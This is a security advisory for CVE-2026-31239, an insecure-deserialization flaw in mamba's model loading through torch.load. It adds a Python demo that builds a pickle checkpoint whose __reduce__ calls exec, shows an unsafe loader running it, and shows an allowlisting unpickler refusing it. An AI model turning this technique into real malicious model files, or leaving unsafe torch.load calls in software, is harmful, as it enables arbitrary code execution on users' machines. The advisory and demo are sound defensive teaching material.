PT-2026-40126 · Mamba · Mamba

Published

2026-05-12

·

Updated

2026-05-12

·

CVE-2026-31239

CVSS v3.1

9.8

Critical

Vector

AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Name of the Vulnerable Software and Affected Versions

mamba versions prior to 2.2.7

Description

Insecure deserialization occurs when loading pre-trained models from HuggingFace Hub. MambaLMHeadModel.from_pretrained() loads the pytorch_model.bin weight file with torch.load() without setting weights_only=True. torch.load() then runs the full pickle machinery, and unpickling untrusted data lets the file name any importable callable and invoke it with attacker-chosen arguments (the pickle __reduce__ protocol), so arbitrary Python objects can be constructed and arbitrary code executed during the load. An attacker who publishes a malicious model repository on HuggingFace Hub therefore executes arbitrary code on the victim's system, within the context of the mamba process, as soon as the model is loaded.

Recommendations

Update to version 2.2.7 or later.
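The mechanism behind the advisory, as an added example that is not code from the mamba project or from the advisory itself: the script below reproduces the attack and the fix with the standard pickle module instead of torch so that it runs offline. A constructed "checkpoint" carries a __reduce__ payload that calls builtins.exec; the unsafe loader mirrors the pre-2.2.7 torch.load(path) default; the RestrictedUnpickler mirrors what weights_only=True does (an allowlist applied to the GLOBAL opcode before any REDUCE can run). The payload statement, the PickleBomb class, the ALLOWED_GLOBALS set and the load_torch_checkpoint helper are assumptions made for this demo, not names from mamba or torch.

```python
import builtins
import io
import pickle

# Constructed, benign stand-in for an attacker's payload. A real payload in a
# published pytorch_model.bin would call os.system or spawn a process; this
# one only sets a flag on the builtins module so the effect is observable.
MARKER_CODE = "import builtins; builtins.PICKLE_PAYLOAD_RAN = True"


def payload_ran():
    """True once the payload's exec() has run in this interpreter."""
    return getattr(builtins, "PICKLE_PAYLOAD_RAN", False)


def reset_marker():
    builtins.__dict__.pop("PICKLE_PAYLOAD_RAN", None)


class PickleBomb:
    """Object whose unpickling invokes an arbitrary callable (hypothetical name)."""

    def __reduce__(self):
        # Serialised as GLOBAL builtins.exec, the args tuple, then REDUCE.
        # Any unpickler that honours REDUCE calls exec(MARKER_CODE) on load.
        return (exec, (MARKER_CODE,))


def build_malicious_checkpoint():
    """Constructed sample: looks like a state_dict, but one value is a payload."""
    payload = {"embedding.weight": PickleBomb()}
    return pickle.dumps(payload, protocol=2)


def build_benign_checkpoint():
    """Constructed sample: plain containers and floats, no GLOBAL opcodes at all."""
    return pickle.dumps({"embedding.weight": [0.1, 0.2, 0.3]}, protocol=2)


def load_unsafe(blob):
    """Mirror of the vulnerable torch.load(path) default: the full pickle VM runs."""
    return pickle.loads(blob)


# Globals a weight file legitimately needs. torch's weights_only mode keeps a
# similar (larger) allowlist covering tensor rebuild helpers and OrderedDict.
ALLOWED_GLOBALS = {("collections", "OrderedDict")}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called for every GLOBAL/STACK_GLOBAL opcode, i.e. before REDUCE can
        # run anything, so refusing here prevents the call entirely.
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"refusing to resolve global {module}.{name}")


def load_restricted(blob):
    """Allowlisted unpickling: the hardened counterpart of load_unsafe()."""
    return RestrictedUnpickler(io.BytesIO(blob)).load()


def load_torch_checkpoint(path):
    """Shape of the actual fix for a real .bin file (hypothetical helper; needs torch)."""
    import torch  # assumption: torch is not available in this offline demo

    return torch.load(path, map_location="cpu", weights_only=True)


if __name__ == "__main__":
    blob = build_malicious_checkpoint()
    print("unsafe load returned:", load_unsafe(blob), "| payload ran:", payload_ran())
    reset_marker()
    try:
        load_restricted(blob)
    except pickle.UnpicklingError as exc:
        print("restricted load refused:", exc, "| payload ran:", payload_ran())
    print("restricted load of benign file:", load_restricted(build_benign_checkpoint()))
```

Running the script shows the unsafe loader returning a plausible-looking dict while the payload has already executed, and the restricted loader rejecting the same bytes at the GLOBAL opcode without any side effect. For real weight files the equivalent is torch.load(path, weights_only=True), which is the default from PyTorch 2.6 onward; where the publisher offers safetensors files, prefer them, since that format carries no executable content.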

Fix

Weakness Enumeration

Deserialization of Untrusted Data (CWE-502)

Related Identifiers

CVE-2026-31239
GHSA-PQ2F-X424-6FJM

Affected Products

Mamba